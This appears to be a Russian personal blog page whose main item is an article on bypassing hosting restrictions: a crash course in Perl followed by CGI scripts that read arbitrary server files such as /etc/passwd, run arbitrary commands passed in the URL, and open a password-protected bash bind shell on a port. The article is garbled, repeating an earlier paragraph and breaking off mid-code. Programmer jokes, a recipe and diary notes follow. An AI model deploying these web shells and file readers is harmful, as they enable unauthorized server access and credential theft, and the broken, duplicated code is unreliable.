Current music: ATB
Состояние: Тваё

Current music: (Radio No.1 in Russia! *** EUROPA PLUS ***. Live broadcasting from Moscow.)
Состояние: доброе

Существует огромное количество хостингов, которые, в целях безопасности или экономии ресурсов, не дают пользователям шелл-доступ, в большинстве случаев также на твою директорию ставится chroot (то есть ты не можешь подняться выше своего домашнего каталога), и это всегда очень бесит. Но эти самые хостинги чаще всего дают тебе свою личную cgi-bin папку, тем самым ставя свою безопасность под угрозу. В этой статье я расскажу тебе, как, используя наличие cgi-bin директории и знаний языка Perl, утереть нос этим засранцам и получить желаемый шелл и доступ к другим директориям.

Perl - язык обработки текстов, или Practical Extraction and Report Language, по стилю очень напоминает Си. Следовательно, если ты уже программировал на Си, тебе будет легче научиться Perl'у. Одной из основных особенностей языка Perl является то, что данные в нем не имеют типов. Программы, написанные на языке Perl, не могут быть откомпилированы, а выполняются через интерпретатор, который в данный момент доступен почти для всех платформ. Также хочется сказать несколько слов об авторе - Ларри Уолле (Larry Wall), который 10 лет бесплатно работал над созданием этого языка и в итоге выиграл премию журнала PCMagazine в 1998 году. А кто с ним соперничал? Продукт Microsoft, Visual Studio. Так что делай выводы.

Get started

Для начала то, с чего начинают учить все языки hello world, условия, циклы, массивы...

1) Тривиальное 'Hello world!' на языке perl будет выглядеть так:


#!/usr/bin/perl #Путь к интерпретатору. Набери 'whereis perl'

print "hello world!\n"; #вывод строки, \n означает новую строку

Запустить программу ты можешь, поставив на нее chmod 755 и набрав ./my.pl, где my.pl - имя программы. Или набрав perl -x my.pl, если у тебя нет шелла, то закинув программу на сервер в папку cgi-bin и поставив на нее chmod 755, набрать ее адрес в броузере. Например, http://www.satanium.ru/cgi-bin/my.pl

2) В Perl'e существуют несколько типов переменных:

Скаляры могут содержать цифры и текст, обозначаются $имя переменной. Например, $a = 1;

Массивы обозначаются @имя массива, он может использоваться целиком,

а может обращаться к какому-либо элементу через индекс.

Например: $evil[0]=1; присваиваем первому элементу массива значение 1, затем

выводим его на экран print "Первый элемент массива evil=$evil[0]\n";

3) Условия выглядят так же, как и в Си. Вот синтаксис их написания:

if(условия)

{действие1;}

elseif (условие)

{действие2;}

else

{действие3;}

Если первое условие выполняется, то производится действие 1, если второе условие выполняется, то производится действие 2, если же не выполняется ни одно из условий, то выполняется действие 3.

Вот пример:

if($i==666)

{print "666 rox da brain\n\a";}

elseif($i==13)

{print "ohhh satan will eat ur soul\n\a";}

else {print "Иди отсюда!\n\a\a\a\a";}

4) В языке Perl существует несколько типов циклов: for, while, foreach и until.

Синтаксис цикла for выглядит так:

For (начальные условия; условия окончания цикла; выполнения действия после каждого прохода)

{действие;}

Пример:

for($i=0;i<=9;$i++)

{print "Элемент массива #$i = $massive[$i]\n";}

В этом примере мы выводим первые 10 элементов массива.

Синтаксис цикла while выглядит так:

while ($evil<666) {

print "SATAN comming!!!\n";

$evil++;

}

Данное действие будет выполняться до тех пор, пока переменная $evil не станет больше 666.

Синтаксис цикла foreach выглядит так:

foreach $phone (@phonebook) {

print "$phone\n"

}

В переменную $phone по порядку передаются элементы из @phonebook. Данный цикл будет работать до тех пор, пока у массива @phonebook не кончатся элементы.

Синтаксис цикла until выглядит так:

Этот цикл - противоположность цикла while, то есть он выполняется, пока условие является правдой.

Пример:

until ($evil>666) {

print "SATAN comming!!!\n";

$evil++;

}

5) Полезные встроенные переменные.

Далее приведен список и описание встроенных переменных, которые будут нам полезны в написании программ:

@ARGV - массив аргументов, вводимых пользователем. Напомню, что в Perl'e $ARGV[0] - это не имя запущенной программы, как в Си, а именно первый аргумент.

$$ или $PID - содержит PID (Process IDentfication) идентификатор процесса.

$< или $UID - содержит UID (User IDentifcator) идентификатор пользователя, с которым запущен процесс.

$(или $GID - содержит GID (Group IDentificator) идентификатор группы, с которым запущен процесс.

Напомню, что CGI (Common Gateway Interface) - это интерфейс взаимодействия веб-сервера и твоей программы. Далее приведены переменные, полезные для написания веб-приложений.

$HTTP USER_AGENT - содержит информацию, передаваемую клиентом серверу, о версии web-броузера.

$REMOTE ADDR - содержит IP-адрес клиента, отправившего запрос к программе.

$REMOTE HOST - содержит хост клиента, отправившего запрос к программе.

$HTTP REFERER - откуда пришел клиент.

6)Полезные функции:

Далее я приведу список встроенных функций, которые будут полезны в нашем деле:

-bind socket,name

Назначает сетевой адрес сокету.

-chmod 0777 'file1','file2';

Изменяет права доступа к указанным файлам.

-chown

Изменяет владельца файла и группу.

-close

Закрытие файла или потока.

-connect сокет, имя

Связаться с удаленным сокетом.

-exec "программа" или system "программа"

Выполняет указанное приложение.

-setsockopt сокет, уровень, опция

Устанавливает параметры сокета.

-kill процесс

Убивает процесс.

-listen SOCKET, QUEUESIZE

Аналогично системному вызову listen().

-open файл

Открывает файл. Если перед именем стоит <, то файл открывается на чтение, а если стоит >, то на запись.

| - запуск

-rand

Возвращает случайное число.

-recv Сокет, Скаляр, Длина, Флаги

Берет сообщение из сокета.

-socket Сокет, Домен, Тип, Протокол

Открывает сокет.

-send SOCKET,MSG,GLAGS

Отсылает сообщение через сокет.

-read файл, скаляр, длина

Читает указанное число байт из файла в переменную.

-

Ожидает ввода с клавиатуры.

-legth

Возвращает длину строки.

-my список

Объявляет список локальных переменных.

-goto подпрограмма, метка и выражение

Переходит на указанную метку.

Юниксоид

Этот тот минимум функций, который я считаю важными для понимания ниже приведенных программ и языка вообще.

7) Подпрограммы следует определять в текущем либо во внешнем файле следующим образом:

sub name; или sub name (прототипы);

Вот собственно и все, но для лучшего понимания я напишу маленький пример:
#!/usr/bin/perl

$i=;

if($i==13) {&hell;} else {&happydude;}

sub hell {print "pop music mustdie\n";}

sub happydude {print "your lame\n\a";}

Получаем Шелл!

Все! Кратчайший курс программирования на Perl'e окончен и теперь переходим собственно к тому самому, что написано в начале, то есть получение шелл-доступа и всего остального, что нам не дают буржуи .

Итак, у нас есть cgi-bin папка и ftp доступ, и мы знаем, насколько могуч язык Perl . Теперь напишем пару программок, которые дадут нам доступ ко всему.

1) Программа, которая будет открывать нам файлы на сервере:


#!/usr/bin/perl

$file = $ARGV[0]; #определяем, что имя файла это первый аргумент

print "Content-type: text/html\n\n"; #лабуда

print "
"; #рисуем столик для красоты

open(bum,"<$file") || die "Файл не найден\n"; #открываем файл или орем, что его нет

while() #цикл чтения файла по строчкам

{

print; #печать строки файла

print "
"; #перевод на следующую строку
}

close(bum); #закрываем файло

print"

"; #закрываем столик

# конец программы


Я думаю, пояснений больше не надо, набираем http://www.my-home.ru/cgi-bin/file.pl?/etc/passwd и получаем листинг файла с паролями.

2) Программа, исполняющая команды:


#!/usr/bin/perl

$file = $ARGV[0]; # определяем, что имя файла это первый аргумент

print "Content-type: text/html\n\n"; #лабуда

print "

"; #рисуем столик для красоты

open(bum,"$file|") || die "Файл не найден\n"; #запускаем прогу или орем, что ее нет

while() #цикл чтения по строчкам

{

print; #печать строки файла

print "
"; #перевод на следующую строку

}

close(bum); #закрываем прогу

print"

"; #закрываем столик

# конец программы

Ты заметил, что изменилось только строка открытия? Но теперь эта программа запускает другие проги (команды) и выдает результат! Достаточно только набрать http://www.my-home.ru/cgi-bin/file.pl?ls, и она выдаст тебе список файлов в текущем каталоге.

3) Программа, открывающая шелл на определенном порте:


#!/usr/bin/perl

$SHELL="/bin/bash -i"; #шелл

$LISTEN PORT=5051; #порт

$PASSWORD="66613"; #пароль

require 5.002; #необходимая версия

use Socket; #использование модуля работы с сокетами

$protocol = getprotobyname('tcp'); #используемый протокол

socket(S, &PF INET, &SOCK STREAM, $protocol) || die "ошибка\n";

setsockopt(S, SOL SOCKET, SO REUSEADDR, 1);

bind (S, sockaddr in($LISTEN PORT, INADDR ANY)) || die "ошибка\n";

listen (S, 3) || die "не могу открыть порт\n";

while (1) {

YOP: accept (T666, S) || goto YOP;

if (! ($pid=fork)) {

goto BYE if (! defined $pid); #fork failed

open STDIN, "<&T666";

open STDOUT, ">&T666";

open STDERR, ">&T666";

if($PASSWORD) { # проверка правильности пароля

Юниксоид

Этот тот минимум функций, который я считаю важными для понимания ниже приведенных программ и языка вообще.

7) Подпрограммы следует определять в текущем либо во внешнем файле следующим образом:

sub name; или sub name (прототипы);

Вот собственно и все, но для лучшего понимания я напишу маленький пример:

#!/usr/bin/p

Current music: Timer - night with you (in mixed...)
Состояние: сонное

[justify]-----------------------------------------------------------------------------------

Подходит сын к отцу и спрашивает:
- Пап а как пишется слово АДРЕС с одной "С" или с двумя?
Отец отвечает:
- Напиши "URL" и иди спать !!!

Едет программист в такси. Вдруг машина сломалась. Водитель пробует завести, но ничего не получается.
Программист советует: - А вы окна-то закройте!

Сидит программист глубоко в отладке.
Подходит сынишка:
- Папа, почему солнышко каждый день встает на востоке, а садится на западе?
- Ты это проверял?
- Проверял.
- Хорошо проверял?
- Хорошо.
- Работает?
- Работает.
- Каждый день работает?
- Да, каждый день.
- Тогда ради бога, сынок, ничего не трогай, ничего не меняй.

Визит министра здравоохранения в одну из психиатрических лечебниц. Осмотрев палаты, процедурные залы, столовую министр здравоохранения изъявляет желание проверить, как содержатся буйно-помешанные больные, опасные для окружающих.
Спускаются на 0-й этаж, Главный врач отпирает стальную кованую дверь. За дверью длинный коридор. Министр здравоохранения переходит от камеры, к камере, читает таблички, иногда заглядывает внутрь.
Около одной из камер. министра здравоохранения: Так-так. Острая паранойя, OS/2 Warp, мания величия... Заглядывает в окошко. Угрюмый тип, увидев министра здравоохранения, начинает метаться по камере, крича: "Ла-а-меры!!! Ла-а-а-меры!!! SUXX, SUXX МастДайная!!!" Министр здравоохранения: (Обращается к главному врачу) Часто он так? Глав. врач: Как новое лицо увидит, сразу приступ...
Идут дальше. Министр здравоохранения: Так-так. Острая паранойя. UNIX, мания величия... Заглядывает в окошко. Угрюмый тип, оторвавшись от созерцания собственных рук, поворачивается, и расплывшись в улыбке, изрекает: "Истинная многозадачность, полный контроль, Рулез Форева!" Министр здравоохранения: (Обращается к главному врачу) Тихий какой!
Выздоравливает? Глав. врач: Нет, временное улучшение.
- (Повернувшись к окошку) - NT! Больной, вскочив с кровати, начинает метаться по камере, крича: "А-а-а!!! Вытесняющая многозадачность!!! Исходные тексты!!! SUXX!!! Ла-а-а-меpы!!!"
Идут дальше. Министр здравоохранения: Так-так. Острая паранойя. Windows 95, мания величия. Заглядывает в окошко...
Камера пуста. Министр здравоохранения: (Недоуменно поворачивается к главному врачу) А где же больной? На процедурах? Глав. врач: Видите ли... Только поймите нас правильно...Бухгалтерия у нас на Excel, личные дела больных на Access...

Один новый русский показывает другому свой дом. Заходят в ванную.
Второй: А че это у тебя такая плитка мелкая?
Первый: Мелкая, зато фирменная!
Второй: А фирма какая?
Первый: Intel ... Compiling Windows: 95% completed.
- Эй, Билл! Опять зависло!
- Ничего, сойдет.

Встречаются два юзера.
- Слушай, тот Windows, который ты мне дал - что за версия. Не пойму почему при каждом запуске машины включается Scandisk.
- А не обращай внимания, "мелкая" ошибка разработчиков OS/2. Залезаешь в autoexec.bat и убираешь строчку "scandisk".

К хакеру приходит ламер с тестом своей не работающей программы и спрашивает:
- Где у меня ошибка?
- В ДНК.
[justify]-----------------------------------------------------------------------------------[/justify]

[/justify]

Current music: Timer - Realization....
Состояние: скептическое

Нам надо:

Пачка лапши - 1шт. (желательно спагетти)
Банка тушенки - 1шт.
Кастрюля с водой - 1шт.
Сковорода - 1шт.

Способ приготовления:

[justify] Кастрюлю с водой поставить на плитку и довести воду до кипения. Забросить лапшу в кастрюлю и варить 10-15 минут. Дождаться пока лапша всплывёт и...нет подождите...это не про лапшу...а вот...пробуете лапшу. Если готова лапша, сливаете воду через друшлак и вываливаете банку тушенки в кастрюлю с лапшой. На медленном огне доводите лапшу и тушенку до состояния готовности. Подавать горячим. Кепчук и маноез по вкусу.
[/justify]

Состояние: srg - Я учусь готовить :))))))) 22:02

Вечером на улице наблюдали такую картину. Кошка влезла на дерево и
громко мяукает, то ли слезть не может, то ли к себе зовет, непонятно...
Видимо хозяин стоит внизу и с ней сначала спокойно разговаривает:
- Мурка, слезай, кис-кис....
И долго он с ней разговаривал, а она все не угомонится, как заведенная
мяучит. У хозяина, наверное, терпение кончилось.
В сердцах, чуть ли
не криком, он выдал последнюю фразу:
- Хватит орать, вей гнездо, ложись спать!!!

Было дело.. вернулось вновь.

Current music: Черный Лукич - Навсегда (3:25)
Состояние: доброе

[justify]Мне приснился СОН, но я никаму нескажу... Во Клёва! т.к мне пофик что он мне приснился ...
[/justify]


Current music: Приключения Электроников - Прекрасное далеко (1:38)
Состояние: радушное